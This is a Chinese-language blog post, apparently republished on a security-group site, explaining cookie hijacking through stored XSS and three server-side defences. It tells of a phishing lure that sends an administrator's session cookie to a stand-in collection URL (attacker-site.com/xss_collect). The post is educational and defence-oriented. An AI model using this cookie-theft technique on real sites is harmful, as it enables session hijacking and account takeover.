Loading
0

你必须知道的cookie攻防技术!!!

前言:

对朋友的一个项目进行code review, 发现问题还真不少. 有些web项目功能虽然五脏俱全, 但对网络安全的意识以及相关的技术沉淀, 几乎可以说没. 这也是很多小作坊式的项目的一类通病.
今天我们来谈谈简单的xss攻击, 以及Cookie劫持的攻与防.

Web实战开发--Cookie劫持的攻与防

案列:

听闻之前通过CCTV电话访问周鸿祎时, 分析其按键声音从而获取红衣教主的电话号码的那个传奇大侠.

Web实战开发--Cookie劫持的攻与防

其后续的一个得意之作, 便是通过给大学的一个助教发了份钓鱼邮件, 成功获取了助教的cookie信息, 最终登陆系统, 提前获取了成绩信息.

那它是怎么实现的呢.

1. Cookie是什么?

2. 窃取的原理是什么?

3. 系统如何防Cookie劫持呢?

看完这三个回答, 你就明白哪位传奇大侠是如何成功的!!!

Cookie:

HTTP天然是无状态的协议, 为了维持和跟踪用户的状态, 引入了Cookie和Session. Cookie包含了浏览器客户端的用户凭证, 相对较小. Session则维护在服务器, 用于维护相对较大的用户信息.

Web实战开发--Cookie劫持的攻与防

用通俗的语言, Cookie是钥匙, Session是锁芯.

Cookie简单理解就是钥匙, 每次去服务端获取资源, 需要带着这把钥匙, 只有自己的锁芯(资源), 才能打开.

如果你丢掉了钥匙, 那没办法, 只能配一把钥匙和锁芯.

但是如果钥匙被别人拿了, 那别人就可以冒充你的身份, 去打开你的锁芯, 从而获取你的信息, 甚至挪用你的资金. 这是非常危险的.

XSS攻击:

XSS(Cross Site Scripting)是跨站点脚本攻击的缩写. 其就是利用站点开放的文本编辑并发布的功能, 从而造成攻击.

其实说的简单一点, 就是输入javascript脚本, 窃取并投递cookie信息到自己的站点.

比如攻击者以一个普通用户登录进来,然后在输入框中提交以下数据:

快看, 这里有美女在洗澡

攻击者提交了条带标签的数据,该条数据保存于服务器端,而管理员登入时,不小心点击这个链接时,则会把自身的cookie信息, 投递给hacker设定的网址.

http://attacker-site.com/xss_collect/m=xxxxxxyyyyyzzz

有了该session-id,攻击者在会话有效期内即可获得管理员的权限,并且由于攻击数据已添加入数据库,只要攻击数据未被删除,那么攻击还有可能生效,是持久性的。

Cookie劫持的防:

基于XSS攻击, 窃取Cookie信息, 并冒充他人身份.

服务端如何防呢?

第一种办法是:

给Cookie添加HttpOnly属性, 这种属性设置后, 只能在http请求中传递, 在脚本中, document.cookie无法获取到该Cookie值. 对XSS的攻击, 有一定的防御值. 但是对网络拦截, 还是泄露了.

第二种办法:

在cookie中添加校验信息, 这个校验信息和当前用户外置环境有些关系,比如ip,user agent等有关. 这样当cookie被人劫持了, 并冒用, 但是在服务器端校验的时候, 发现校验值发生了变化, 因此要求重新登录, 这样也是种很好的思路, 去规避cookie劫持.

第三种办法:

cookie中session id的定时更换, 让session id按一定频率变换, 同时对用户而言, 该操作是透明的, 这样保证了服务体验的一致性.

后记:

XSS的攻与防, 有很多思路和解决方案. 该文章也是简单谈谈对Cookie劫持的攻与防的一些思路.

【声明】:8090安全小组门户(https://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们:邮箱hack@ddos.kim,我们会在最短的时间内进行处理。